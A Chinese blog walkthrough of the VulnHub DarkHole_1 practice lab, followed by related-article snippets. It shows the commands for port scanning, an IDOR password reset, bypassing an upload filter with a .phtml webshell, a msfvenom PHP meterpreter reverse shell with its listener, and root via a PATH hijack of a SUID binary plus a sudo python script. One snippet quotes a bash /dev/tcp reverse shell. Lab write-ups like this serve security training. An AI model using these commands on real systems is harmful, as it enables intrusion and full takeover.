VulnHub靶场之DarkHole_1

最新推荐文章于 2024-11-12 10:58:08 发布
最新推荐文章于 2024-11-12 10:58:08 发布
阅读量697 收藏 11
点赞数 17
分类专栏: vulnhub靶场 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45653478/article/details/140157483
版权

1 信息收集

1.1 主机发现

arp-scan -l

主机IP地址为:192.168.1.17

1.2 端口和服务扫描

nmap -sS -sV -A -T5 -p- 192.168.1.17

开放22,80端口

1.3 目录扫描

dirsearch -u 192.168.1.17

2 渗透

2.1 访问端口

2.2 注册账号

暴力破解不现实,可以尝试注册一个个账号

分别输出入用户名,邮箱,密码

2.3 登录网站

2.4 抓包

测试修改密码并将id修改为1

这里现在密码已经更新 已经修改好了从新登入:admin/123 发现登入成功!!!! 看到一个上传点 🆗又可以继续利用了

2.5 文件上传

这里过滤了很多试了好几个都不行(连接不上)可以使用phar或者phtml进行绕过

新建一个文档输入: ` 把后缀改为png、jpg、gif然后抓包 修改为phtml`然后放包 有个蓝色的file点击即可

上传结果

2.6 中国蚁剑链接

2.7 反弹shell

1 生成php反弹shell脚本:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.52 lpor=4444 -o shell.php

2 启动pythonweb服务

python3 -m http.server 80

在靶机的upload文件夹下载:

wget http://192.168.1.17/shell.php

3 kali启动msf监听

开启msf,使用模块,设置参数和载荷:

use exploit/multi/handler
set lhost 192.168.1.52
set lport 4444
set payload php/meterpreter/reverse_tcp

开启监听并访问shell文件触发监听:

run
http://192.168.1.17//upload/msfshell.php

进入shell,并生成一个交互式shell:

shell
python3 -c 'import pty;pty.spawn("/bin/bash")'

3 提权

3.1 敏感文件

查看敏感文件之后发现有两个用户:

cat /etc/passwd | grep /bin/bash

3.2 提权

经过一番搜索,在john的家目录发现一个叫toto的文件,具有SUID权限,其作用是输出id:

既然如此,我们能不能修改一下环境变量,让他执行id命令的时候打开一个john的bash:

echo "/bin/bash" > /tmp/id
chmod 777 /tmp/id
export PATH=/tmp:$PATH
./toto

拿到john的权限之后,查看john的家目录,找到了密码:

查看john的权限: 这里需要输入密码

sudo -l

发现john可以以root的身份执行file这个python文件:

在file.py里面写一段打开shell的代码,再以root的身份执行:

echo "import pty;pty.spawn('/bin/bash')" > file.py
sudo python3 /home/john/file.py

成功拿到root权限!!!

VulnHub渗透靶场-DarkHole_1
m0_74631795的博客
09-14 939
若存在漏洞,此时管理员的密码已经被修改为123456,回到刚才的登录页面,使用管理员账号进行登录。新建id文件,并写入PATH,运行toto文件使用john身份调用id命令时就会获得shell。使用/bin/bash为默认shell的用户有root,darkhole,john。将shell命令写入脚本中,执行时,就可以得到root权限的shell了。用户名为john,密码为password的内容。猜测管理员的id为1,修改id=1重新发送。2-1直接修改url的id值,操作失败。使用新用户的账号密码登录。
VulnHubDarkHole_ 1
2301_76786857的博客
07-09 222
靶机IP:192.168.245.143测试机系统:kali、win10测试机IP:192.168.245.139。
CTF学习-Vulnhub 靶场DARKHOLE
dengpan119的博客
03-30 3882
文章目录前期准备一、信息收集二、使用步骤1.引入库2.读入数据总结 前期准备 靶机地址:https://www.vulnhub.com/entry/darkhole-2,740/ kali攻击机ip:172.X.X.176 windows 10攻击机:172.X.X.189 靶机ip:172.X.X.188 一、信息收集 首先利用arp-scan -l 扫描到靶机IP: 然后使用nmap扫描靶机端口信息 发现靶机开放了22和80业务端口,还有一个敏感信息.git仓库文件,那就把仓库转过来看看,使用gi
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
精品博客,你值得一看~
08-13 4759
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
VulnHub-DarkHole_ 2靶机详细渗透过程
MRS_jianai的博客
12-29 1249
VulnHub-DarkHole: 2靶机详细渗透过程
Vulnhub靶场Vulnhub靶场实战解析之DarkHole-1
KKleeeaa的博客
05-20 721
然后我们在通过之前的页面,就可以试试越权修改账户密码。我们知道了靶机的IP为192.168.5.159然后开放22(SSH),80(http),我们可以访问一下网页。第一步我们首先nmap扫描网段查看端口开放情况,因为我们不知道靶机的IP地址是多少。进去之后发现是这个个人信息页面,我们看到上面的URL链接ID=2我们把他改为1试试。可以看到成功的进入到admin的页面,然后这里有个上传文件的地方,直接上传马。然后我们看到下面有个可以注册的地方,我们可以注册一个账号。先开启抓包,然后再抓取修改密码的包。
DarkHole2 vulnhub靶场
weixin_62621015的博客
03-16 288
DarkHole2 vulnhub靶场个人通关笔记 不是很难
VulnHub-DarkHole_1靶机详细渗透教程
MRS_jianai的博客
12-30 2852
VulnHub-DarkHole:1靶机详细渗透教程
vulnhub靶场实战——DarkHole
weixin_71914594的博客
10-15 379
靶场地址:https://www.vulnhub.com/entry/darkhole-1,724/下载连接:https://download.vulnhub.com/darkhole/DarkHole.zip解压后打开ova文件配置网络设置为Net模式。
vulnhub-DarkHole 1-靶场-打靶记录
lcc001114的博客
06-15 658
这里我们登录进去修改密码点change抓包,发现id=2,咱么大胆猜测一下管理员账户的 id=1, 那么我们尝试抓包越权修改管理员密码。发现第一个无限注册的漏洞(靶场没卵用),后端只校验用户名/邮箱/在数据库重没重复,并没有验证码进行注册限制。接下来用注册好的账号登录,在拦截登录第二个包发现个熟悉的身影adshboard.php并且携带id。更改环境变量,等执行./toto时会执行id,执行id时就会执行我们的/bin/bash。正常来讲应该是成功了,但这却失败了可能是蚁剑的原因,反弹到kali机上试试。
VulnHub靶场MONEYBOX:1
01-05
MONEYBOX:1是VulnHub上的一个靶场环境,提供了虚拟机镜像,可以在本地安装并尝试完成渗透测试任务。这个靶场类似于一个游戏,需要逐步完成各种挑战,提权、漏洞利用、代码审计等,最终获得root权限并发现flag。 在...
Vulnhub靶场题解
08-24
Vulnhub是一个专门提供给安全爱好者和渗透测试人员进行实践和学习的安全靶场平台。它的特色在于提供了各种带有预设漏洞的虚拟机镜像文件,这允许用户在模拟的环境中进行渗透测试和安全攻防演练。通过使用这些虚拟机...
breach-1--vulnhub靶场
m0_46982383的博客
08-14 2491
keytool -importkeystore -srckeystore /root/下载/keystore -destkeystore /root/下载/keystore.p12 -deststoretype pkcs12。tidyup.sh这是一段清理脚本,描述中说明每3分钟执行清理,删除webapps目录下的文件,因此之前上传的菜刀马总是被删除,需要重新上传。访问https://192.168.110.140:8443/getshell/,等几秒,kali获得反弹shell。*u=G)4m7zB。..
【网络安全 | 甲方建设】构建安全的密码重置功能
等风来
11-12 46
任何需要登录的网站,都需为用户提供“找回密码”功能,以便在用户忘记密码时可以重新获得访问权限。但要做到安全可靠、避免漏洞并非易事。本文从“默认安全”的角度出发,探讨如何设计安全的找回密码功能,但在实际业务中,需兼顾用户体验。
2024年网络安全(黑客技术)三个月自学手册
csbDD的博客
11-06 2151
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
【网络安全 | 漏洞挖掘】隐藏的 DOS 技术
等风来
11-11 178
我调查了这些参数的用途,发现它们被传递给了第三方服务,且该服务的文档说明这些参数是安全的。你可以试试这样做:前往https://ash-speed.hetzner.com/并找到一个测试文件(大小大约1到10 GB),如果服务器等待URL请求完成,你可以通过大量此类请求来淹没服务器,从而导致它最终崩溃。于是我发送了一个包含1000个UUID的列表,结果网站在60秒后超时,并出现了显著的延迟。在我的案例中,这导致了客户网站的DOS攻击,问题被发现并快速修复,甚至在我报告漏洞之前。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
11-11 380
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
shodan 【2】(泷羽sec)
m0_68984471的博客
11-08 893
shodan的使用方法
FMEA在网络安全中的应用实践
最新发布
weixin_45217569的博客
11-12 335
2、识别失效模式:基于过往的安全事件、行业报告及威胁情报,列举出所有可能的失效模式,包括但不限于数据泄露、DDoS攻击、恶意软件入侵等。3、评估影响程度:对每种失效模式进行量化评估,考虑其对业务连续性、数据完整性、用户隐私等方面的影响,以及可能引发的法律后果和声誉损失。4、确定原因与概率:深入分析导致失效的根本原因,包括技术漏洞、人为错误、外部威胁等,并估算各原因发生的可能性。6、监控与持续改进:建立监控机制,跟踪预防措施的有效性,并根据新出现的威胁和技术发展,不断优化FMEA模型。
vulnhub靶场通关
09-09
1. 环境搭建:下载靶场环境,并启动靶场环境。 2. 信息收集:通过探测靶机真实IP和开放的端口及服务进行信息收集。 3. 访问web站点:访问web站点并进行网站的扫描和漏洞探测。 4. 利用漏洞:使用Metasploit框架(MSF)...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值